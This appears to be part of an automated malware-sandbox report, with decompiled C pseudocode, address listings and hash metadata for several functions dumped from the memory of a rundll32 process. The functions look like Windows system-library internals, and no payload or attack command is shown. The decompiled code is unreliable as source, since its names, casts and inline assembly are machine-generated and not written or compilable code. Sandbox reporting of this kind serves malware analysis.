							_push( *_t10);
							_t53 = E04619890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E045EEEF0(0x46c79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E045EEB70(0, 0x46c79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x9e2bf002
								_t13 = _t104 + 0xc; // 0x29e2be5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0460F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E045EEEF0(0x46c79a0);
									__eflags =  *0x46c8210 - _t104; // 0x29e2bd8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x46c8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x20029e2b
											_t95 =  *((intOrPtr*)( *_t37));
											E04654888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E045EEB70(_t95, 0x46c79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E046195D0();
											L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E046195D0();
											L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E045EEB70(_t93, 0x46c79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E046195D0();
										L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E046195D0();
										L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x20029e2b
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x9e2bf002
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0460F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                            0x045d52a5
                                                                                            0x045d52ad
                                                                                            0x045d52b0
                                                                                            0x045d52b3
                                                                                            0x045d52b7
                                                                                            0x045d52ba
                                                                                            0x045d52bf
                                                                                            0x045d52c4
                                                                                            0x045d52cc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045d52ce
                                                                                            0x045d52d1
                                                                                            0x045d52d9
                                                                                            0x045d52dd
                                                                                            0x045d52e7
                                                                                            0x045d52f7
                                                                                            0x045d52f9
                                                                                            0x045d52fd
                                                                                            0x04630dcf
                                                                                            0x04630dd5
                                                                                            0x04630dd6
                                                                                            0x04630dd7
                                                                                            0x04630dd8
                                                                                            0x04630dd9
                                                                                            0x04630dde
                                                                                            0x04630ddf
                                                                                            0x04630de0
                                                                                            0x04630de1
                                                                                            0x04630de2
                                                                                            0x04630de2
                                                                                            0x04630de5
                                                                                            0x04630dea
                                                                                            0x04630dec
                                                                                            0x04630f60
                                                                                            0x04630f64
                                                                                            0x04630f70
                                                                                            0x04630f76
                                                                                            0x04630f79
                                                                                            0x04630f79
                                                                                            0x00000000
                                                                                            0x04630f64
                                                                                            0x04630df2
                                                                                            0x04630df7
                                                                                            0x04630e04
                                                                                            0x04630e04
                                                                                            0x04630e0d
                                                                                            0x04630e0d
                                                                                            0x04630e10
                                                                                            0x04630e1a
                                                                                            0x04630e1c
                                                                                            0x04630e4c
                                                                                            0x04630e52
                                                                                            0x04630e61
                                                                                            0x04630e67
                                                                                            0x04630e6b
                                                                                            0x04630e70
                                                                                            0x04630e76
                                                                                            0x04630ed7
                                                                                            0x04630edc
                                                                                            0x04630ee0
                                                                                            0x04630ee6
                                                                                            0x04630eea
                                                                                            0x04630eed
                                                                                            0x04630ef0
                                                                                            0x04630ef3
                                                                                            0x04630ef6
                                                                                            0x04630ef9
                                                                                            0x04630efb
                                                                                            0x04630efe
                                                                                            0x04630f01
                                                                                            0x04630f01
                                                                                            0x04630f0b
                                                                                            0x04630f12
                                                                                            0x04630f16
                                                                                            0x04630f18
                                                                                            0x04630f18
                                                                                            0x04630f1b
                                                                                            0x04630f2c
                                                                                            0x04630f31
                                                                                            0x04630f31
                                                                                            0x04630f35
                                                                                            0x04630f39
                                                                                            0x04630f3a
                                                                                            0x04630f3c
                                                                                            0x04630f3c
                                                                                            0x04630f3f
                                                                                            0x04630f50
                                                                                            0x04630f55
                                                                                            0x04630f55
                                                                                            0x04630f59
                                                                                            0x045d52eb
                                                                                            0x045d52f1
                                                                                            0x045d52f1
                                                                                            0x04630e7d
                                                                                            0x04630e84
                                                                                            0x04630e88
                                                                                            0x04630e8a
                                                                                            0x04630e8a
                                                                                            0x04630e8d
                                                                                            0x04630e9e
                                                                                            0x04630ea3
                                                                                            0x04630ea3
                                                                                            0x04630ea7
                                                                                            0x04630eaf
                                                                                            0x04630eb3
                                                                                            0x04630eb9
                                                                                            0x04630eb9
                                                                                            0x04630ebc
                                                                                            0x04630ecd
                                                                                            0x04630ecd
                                                                                            0x00000000
                                                                                            0x04630eb3
                                                                                            0x04630e1e
                                                                                            0x04630e21
                                                                                            0x04630e25
                                                                                            0x04630e2b
                                                                                            0x04630e2f
                                                                                            0x04630e30
                                                                                            0x04630e3a
                                                                                            0x04630e3f
                                                                                            0x04630e41
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04630e47
                                                                                            0x00000000
                                                                                            0x04630e47
                                                                                            0x04630df9
                                                                                            0x04630dfe
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04630dfe
                                                                                            0x045d5303
                                                                                            0x045d5307
                                                                                            0x00000000
                                                                                            0x045d5309
                                                                                            0x00000000
                                                                                            0x045d5309
                                                                                            0x045d5307
                                                                                            0x045d52e9
                                                                                            0x045d52e9
                                                                                            0x00000000
                                                                                            0x045d52e9
                                                                                            0x045d530e
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3ca13773ccd36d747a9f5e372b0b8c4d19f66c9bb70eae3e86f13fd1c70737c4
                                                                                            • Instruction ID: d878319dad848b39764cb26a468ddf64c811d9ed10db7f5f153f952a3dfd5770
                                                                                            • Opcode Fuzzy Hash: 3ca13773ccd36d747a9f5e372b0b8c4d19f66c9bb70eae3e86f13fd1c70737c4
                                                                                            • Instruction Fuzzy Hash: A551EA71205782ABE320EF28C841B2BBBE4FF94715F14492EE49587650F774F808EB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04602AE4 Relevance: .2, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E04602AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x46c8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x46c8208; // 0x46c8207
				_t8 = _t57 + 0x46c8208; // 0x46c8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x46c8450; // 0x29e174c
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x46c821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x46c6d5c; // 0x7fce0654
							_t72 =  *0x46c6d5c; // 0x7fce0654
							_t75 =  *0x46c6d5c; // 0x7fce0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x46c6d5c; // 0x7fce0654
							_t84 =  *0x46c6d5c; // 0x7fce0654
							_t87 =  *0x46c6d5c; // 0x7fce0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0461F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                                                            0x04602ae4
                                                                                            0x04602aec
                                                                                            0x04602aef
                                                                                            0x04602af4
                                                                                            0x04602af7
                                                                                            0x04602afd
                                                                                            0x04602b92
                                                                                            0x04602b92
                                                                                            0x04602b97
                                                                                            0x04602b9c
                                                                                            0x04602b9c
                                                                                            0x04602b03
                                                                                            0x04602b06
                                                                                            0x04602b09
                                                                                            0x04602b09
                                                                                            0x04602b0f
                                                                                            0x04602b15
                                                                                            0x04602b15
                                                                                            0x04602b1b
                                                                                            0x04602b1e
                                                                                            0x04602b21
                                                                                            0x04602b26
                                                                                            0x04602b29
                                                                                            0x04602b81
                                                                                            0x04602b84
                                                                                            0x04602c0e
                                                                                            0x04602c15
                                                                                            0x04602c24
                                                                                            0x04602c24
                                                                                            0x04602b8a
                                                                                            0x04602b8a
                                                                                            0x04602b8a
                                                                                            0x04602b8a
                                                                                            0x04602b90
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602b4a
                                                                                            0x04602b4a
                                                                                            0x04602b4d
                                                                                            0x04602b53
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602b55
                                                                                            0x04602b58
                                                                                            0x04602bb7
                                                                                            0x04645d1b
                                                                                            0x04645d37
                                                                                            0x04645d47
                                                                                            0x04645d53
                                                                                            0x04602bbd
                                                                                            0x04602bbd
                                                                                            0x04602bbd
                                                                                            0x04602bb7
                                                                                            0x04602b5d
                                                                                            0x04602c2f
                                                                                            0x04645d5b
                                                                                            0x04645d77
                                                                                            0x04645d87
                                                                                            0x04645d93
                                                                                            0x04602c35
                                                                                            0x04602c35
                                                                                            0x04602c35
                                                                                            0x04602c2f
                                                                                            0x04602b65
                                                                                            0x04602b9f
                                                                                            0x04602ba2
                                                                                            0x04602b67
                                                                                            0x04602b67
                                                                                            0x04602b69
                                                                                            0x04602b6b
                                                                                            0x04602b6e
                                                                                            0x04602bc9
                                                                                            0x04602bcc
                                                                                            0x04602bcf
                                                                                            0x04602bd4
                                                                                            0x04602bd6
                                                                                            0x04602bd6
                                                                                            0x04602bdb
                                                                                            0x04602c02
                                                                                            0x04602c05
                                                                                            0x04602c07
                                                                                            0x00000000
                                                                                            0x04602c07
                                                                                            0x04602be0
                                                                                            0x04602c00
                                                                                            0x04602c3f
                                                                                            0x04602c3f
                                                                                            0x00000000
                                                                                            0x04602c00
                                                                                            0x04602be5
                                                                                            0x04602be7
                                                                                            0x04602bec
                                                                                            0x04602bf4
                                                                                            0x04602bf6
                                                                                            0x00000000
                                                                                            0x04602bf6
                                                                                            0x04602b70
                                                                                            0x04602b76
                                                                                            0x04602b2b
                                                                                            0x04602b2b
                                                                                            0x04602b2d
                                                                                            0x04602b2f
                                                                                            0x04602b32
                                                                                            0x04602b35
                                                                                            0x04602b3a
                                                                                            0x00000000
                                                                                            0x04602b40
                                                                                            0x04602b43
                                                                                            0x04602b45
                                                                                            0x04602b47
                                                                                            0x04602b4a
                                                                                            0x04602b4d
                                                                                            0x04602b53
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602b53
                                                                                            0x04602b78
                                                                                            0x04602b78
                                                                                            0x04602b7b
                                                                                            0x04602b7e
                                                                                            0x00000000
                                                                                            0x04602b7e
                                                                                            0x04602b76
                                                                                            0x04602ba5
                                                                                            0x04602ba5
                                                                                            0x04602ba8
                                                                                            0x04602bad
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04602baf
                                                                                            0x04602baf
                                                                                            0x04602bc2
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f1f4ad37e06e0cc90703294d896b49b1b82a99a10e66cc6b4750a26b1f96145e
                                                                                            • Instruction ID: d38b0207096db8749ede8144dd06e2ede9d33d727b113eb355924925f68e1848
                                                                                            • Opcode Fuzzy Hash: f1f4ad37e06e0cc90703294d896b49b1b82a99a10e66cc6b4750a26b1f96145e
                                                                                            • Instruction Fuzzy Hash: 6D5190B6B001258BCB18DF18C8A89BEB7B1FF98704715C49AE8469B390F734BE51D790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045FDBE9 Relevance: .1, Instructions: 149COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 86%
                                                                                            			E045FDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E045DCC50(E045D4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E045F7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E046A8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E045F2280(_t58, _v44);
						E045FDD82(_v44, _t102, _t98);
						E045FB944(_t102, _v5);
						return E045EFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x46c8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x46c862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x46c8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x46c862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x469fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                                            0x045fdbe9
                                                                                            0x045fdbf2
                                                                                            0x045fdbf7
                                                                                            0x045fdbf9
                                                                                            0x045fdbfc
                                                                                            0x045fdc00
                                                                                            0x045fdc03
                                                                                            0x045fdc14
                                                                                            0x045fdd54
                                                                                            0x045fdd54
                                                                                            0x045fdd54
                                                                                            0x045fdc18
                                                                                            0x045fdc1d
                                                                                            0x045fdc1d
                                                                                            0x045fdc32
                                                                                            0x045fdc3b
                                                                                            0x045fdc3e
                                                                                            0x045fdc46
                                                                                            0x045fdd5b
                                                                                            0x045fdd62
                                                                                            0x045fdd64
                                                                                            0x045fdd67
                                                                                            0x045fdd69
                                                                                            0x045fdd6b
                                                                                            0x045fdd6e
                                                                                            0x045fdd70
                                                                                            0x045fdd73
                                                                                            0x045fdd73
                                                                                            0x00000000
                                                                                            0x045fdc4c
                                                                                            0x045fdc4e
                                                                                            0x04643ae3
                                                                                            0x04643ae8
                                                                                            0x04643aea
                                                                                            0x045fdce7
                                                                                            0x045fdce9
                                                                                            0x045fdcec
                                                                                            0x045fdcee
                                                                                            0x045fdcf0
                                                                                            0x045fdcf3
                                                                                            0x045fdcf5
                                                                                            0x04643af2
                                                                                            0x04643af5
                                                                                            0x04643af5
                                                                                            0x045fdd06
                                                                                            0x045fdd08
                                                                                            0x045fdd0b
                                                                                            0x045fdd12
                                                                                            0x04643b08
                                                                                            0x045fdd18
                                                                                            0x045fdd18
                                                                                            0x045fdd18
                                                                                            0x045fdd20
                                                                                            0x045fdd23
                                                                                            0x04643b16
                                                                                            0x04643b16
                                                                                            0x045fdd29
                                                                                            0x045fdd2d
                                                                                            0x045fdd36
                                                                                            0x045fdd40
                                                                                            0x045fdd51
                                                                                            0x045fdd51
                                                                                            0x045fdc54
                                                                                            0x045fdc59
                                                                                            0x045fdc59
                                                                                            0x045fdc5e
                                                                                            0x045fdc5e
                                                                                            0x045fdc63
                                                                                            0x045fdc66
                                                                                            0x045fdc6b
                                                                                            0x045fdc78
                                                                                            0x045fdc7b
                                                                                            0x045fdc81
                                                                                            0x045fdc81
                                                                                            0x045fdc83
                                                                                            0x045fdc89
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045fdd7b
                                                                                            0x045fdd7b
                                                                                            0x045fdc8f
                                                                                            0x045fdc8f
                                                                                            0x045fdc92
                                                                                            0x045fdc99
                                                                                            0x045fdc9f
                                                                                            0x045fdca5
                                                                                            0x045fdcaa
                                                                                            0x045fdcaa
                                                                                            0x045fdcb3
                                                                                            0x045fdcb8
                                                                                            0x045fdcbb
                                                                                            0x045fdcc1
                                                                                            0x045fdccf
                                                                                            0x045fdcd2
                                                                                            0x045fdcd5
                                                                                            0x045fdcd7
                                                                                            0x045fdcda
                                                                                            0x045fdcdc
                                                                                            0x045fdcdc
                                                                                            0x045fdce2
                                                                                            0x045fdce4
                                                                                            0x00000000
                                                                                            0x045fdce4

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ed70fd39ed0f2da18d619b7899f7871261718e37bac73a8d7044a485d3d20d79
                                                                                            • Instruction ID: 9ca7ba3d186097ee9b571d9fd33d43bb5ea06b630db96d09b66789d2d14eb78f
                                                                                            • Opcode Fuzzy Hash: ed70fd39ed0f2da18d619b7899f7871261718e37bac73a8d7044a485d3d20d79
                                                                                            • Instruction Fuzzy Hash: 9051B071A01605DFCB14CF68C880AAEBBF1BF88354F20855ADA56E7344EB30B948DB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045EEF40 Relevance: .1, Instructions: 147COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 96%
                                                                                            			E045EEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E045D9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77cfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E045D2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
